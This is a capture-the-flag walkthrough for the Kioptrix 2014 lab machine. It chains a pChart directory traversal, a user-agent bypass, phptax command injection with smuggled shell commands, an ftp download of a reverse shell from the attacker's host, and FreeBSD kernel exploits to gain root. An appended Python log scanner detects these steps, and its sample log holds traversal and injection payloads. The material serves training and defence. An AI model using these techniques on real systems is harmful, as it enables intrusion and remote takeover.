Kioptrix2014 (#5)


  • netdiscover
  • Nmap
  • Nikto
  • User Agent Switcher


Use netdiscover to detect the target IP address:

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Ports 80 and 8080 are open.

Use nikto to scan:

nikto -h

nothing cool.

Use Firefox to check the page on port 80:

Just a simple "It works".

port 8080

Got Forbidden. Great :(

Now go back to port 80 and check the source code:

Found pchart2.1.3. I googled pchart2.1.3 and found the exploit "pChart 2.1.3 - Multiple Vulnerabilities". I will use the directory traversal.

Got the passwd file. This is good, but not good enough because I cannot get the shadow file.

Since Nmap determined that the target OS is FreeBSD, the Apache configuration file is /usr/local/etc/apache2x/httpd.conf. Apache HTTP Server

Here I find:

Port 8080 only allows the Mozilla/4.0 user-agent. I use User Agent Switcher (Firefox plugin) to change my user-agent to Mozilla/4.0, then visit

Now search for phptax:

searchsploit phptax

test upload php shell first:; uname > test.txt&pdf=make

Here I tried to wget the PHP shell from my HTTP server, but it didn't work. I also tried to write the PHP shell to a PHP file directly, which also failed. Now I use ftp to upload my shell:

check if ftp is available:;which ftp >test1.txt; &pdf=make

php reverse shell:


change the IP address:

upload the shell using ftp:;ftp -4 -d -v ftp://bobftpusername:bobftppassword@; &pdf=make

set up nc listener

get the shell:

check the kernel version

It's FreeBSD 9.0-RELEASE. searchsploit freebsd 9.0

copy these two exploits to /ftphome/

download them to the target:

ftp -4 -d -v ftp://bobftpusername:bobftppassward@
ftp -4 -d -v ftp://bobftpusername:bobftppassward@

get the F***ing root:
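Seen from the defender's side, three of the steps above leave marks in the Apache access log: the directory traversal, the switch to a Mozilla/4.0 user-agent, and the command placed in front of &pdf=make. The following is an added example, not part of the original walkthrough, that flags those patterns; the log lines, paths and parameter names are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" log format; captures client IP, request target, User-Agent.
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
TRAVERSAL = re.compile(r'(^|[/\\])\.\.([/\\]|$)')   # ../ or ..\ path segment
SHELL_META = re.compile(r'[;|`]|\$\(|&&')           # shell command separators

def scan(lines):
    """Return sorted (line_number, rule) findings for an access log."""
    findings, agents = set(), {}
    for no, raw in enumerate(lines, 1):
        m = LINE.match(raw.strip())
        if not m:
            continue  # not a combined-format line
        ip, target, ua = m.groups()
        for pair in urlsplit(target).query.split("&"):
            # Decode first so %2e%2e%2f and %3B are caught as well.
            value = unquote_plus(pair.partition("=")[2])
            if TRAVERSAL.search(value):
                findings.add((no, "traversal"))
            if SHELL_META.search(value):
                findings.add((no, "shell-metachar"))
        # A client that suddenly presents a different User-Agent string.
        seen = agents.setdefault(ip, set())
        if seen and ua not in seen:
            findings.add((no, "ua-change"))
        seen.add(ua)
    return sorted(findings)

# Constructed sample log (documentation IP range, placeholder paths).
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
SAMPLE = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 152 "-" "{FIREFOX}"',
    f'192.0.2.10 - - [01/Jan/2024:10:02:11 +0000] "GET /app/view.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1653 "-" "{FIREFOX}"',
    '192.0.2.10 - - [01/Jan/2024:10:09:40 +0000] "GET /app/ HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [01/Jan/2024:10:12:03 +0000] "GET /app/form.php?name=1%3B%20uname%20%3E%20test.txt&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
    '192.0.2.77 - - [01/Jan/2024:10:13:00 +0000] "GET /app/form.php?name=alice&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for no, rule in scan(SAMPLE):
        print(f"line {no}: {rule}")
```

The ua-change rule is noisy on shared or NAT'd addresses, so it is best used to correlate with the other two findings rather than to alert on its own.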